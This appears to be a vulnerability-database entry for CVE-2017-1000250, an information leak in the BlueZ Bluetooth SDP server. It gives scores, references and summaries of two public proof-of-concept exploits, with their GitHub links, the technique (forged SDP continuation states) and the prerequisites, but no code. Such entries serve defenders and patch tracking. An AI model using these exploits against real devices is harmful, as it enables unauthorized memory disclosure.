CVE-2017-1000250

MEDIUM

bluez < 5.46 - Exposure of Sensitive Information via SDP Search Attribute Request

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 2 public exploits for CVE-2017-1000250. PoCs published by Miracle963, olav-st.

AI-analyzed exploit summary This repository contains a functional PoC exploit for CVE-2017-1000250, which leverages a Bluetooth L2CAP vulnerability to remotely leak heap data from Linux devices. The exploit crafts malicious SDP packets to trigger an information leak via improper handling of the continue state in the SDP protocol.

Description

All versions of the SDP server in BlueZ 5.46 and earlier are vulnerable to an information disclosure vulnerability which allows remote attackers to obtain sensitive information from the bluetoothd process memory. This vulnerability lies in the processing of SDP search attribute requests.

Exploits (2)

github WORKING POC 38 stars
by Miracle963 · pythonpoc
https://github.com/Miracle963/bluetooth-cve/tree/master/littl_tools/CVE-2017-1000250

This repository contains a functional PoC exploit for CVE-2017-1000250, which leverages a Bluetooth L2CAP vulnerability to remotely leak heap data from Linux devices. The exploit crafts malicious SDP packets to trigger an information leak via improper handling of the continue state in the SDP protocol.

Classification
Working Poc 95%
Attack Type
Info Leak
Complexity
Moderate
Reliability
Reliable
Target: Linux Bluetooth stack (BlueZ)
No auth needed
Prerequisites: Bluetooth enabled on target · Target device must be within Bluetooth range · L2CAP socket access on attacker's machine
devstral-2 · analyzed Feb 27, 2026 Full analysis →
nomisec WORKING POC 5 stars
by olav-st · poc
https://github.com/olav-st/CVE-2017-1000250-PoC

This repository contains a functional Python exploit for CVE-2017-1000250, which leverages a BlueZ continuation state vulnerability to leak memory from a target Linux system via Bluetooth L2CAP. The PoC forges continuation states to dump memory contents, demonstrating the information leak vulnerability.

Classification
Working Poc 95%
Attack Type
Info Leak
Complexity
Moderate
Reliability
Reliable
Target: BlueZ (Linux Bluetooth stack)
No auth needed
Prerequisites: Bluetooth connectivity to the target · Target must have BlueZ with the vulnerable version
devstral-2 · analyzed Feb 18, 2026 Full analysis →

References (9)

Core 9
Core References
Exploit, Technical Description, Third Party Advisory x_refsource_misc
https://www.armis.com/blueborne
Third Party Advisory vendor-advisory x_refsource_debian
http://www.debian.org/security/2017/dsa-3972
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/100814
Vendor Advisory x_refsource_confirm
http://nvidia.custhelp.com/app/answers/detail/a_id/4561
Third Party Advisory, US Government Resource third-party-advisory x_refsource_cert-vn
https://www.kb.cert.org/vuls/id/240311
Vendor Advisory vendor-advisory x_refsource_redhat
https://access.redhat.com/errata/RHSA-2017:2685
Issue Tracking, Third Party Advisory, VDB Entry
https://access.redhat.com/security/cve/CVE-2017-1000250

Scores

CVSS v3 6.5
EPSS 0.0777
EPSS Percentile 93.9%
Attack Vector ADJACENT_NETWORK
CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Details

CWE
CWE-200
Status published
Products (1)
bluez/bluez < 5.46
Published Sep 12, 2017
Tracked Since Feb 18, 2026